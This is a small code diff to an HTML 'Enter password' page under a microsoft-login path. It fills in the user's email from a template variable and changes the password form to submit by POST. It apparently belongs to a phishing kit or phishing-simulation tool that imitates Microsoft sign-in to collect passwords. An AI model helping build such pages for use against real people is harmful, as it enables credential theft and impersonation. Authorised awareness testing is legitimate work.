--- a/microsoft-login/index2.html
+++ b/microsoft-login/index2.html
@@ -19,7 +19,7 @@
                 <span id="user_identity">{{.Email}}</span>
             </div>
             <h2 class="title mb-16">Enter password</h2>
-            <form id="signin_form"> <!-- Ajout de l'attribut id au formulaire -->
+            <form id="signin_form" method="POST"> <!-- Ajout de l'attribut id au formulaire -->
                 <div class="mb-16">
                     <p id="error_pwd" class="error"></p>
                     <input id="inp_pwd" type="password" name="pass" class="input" placeholder="Password" />
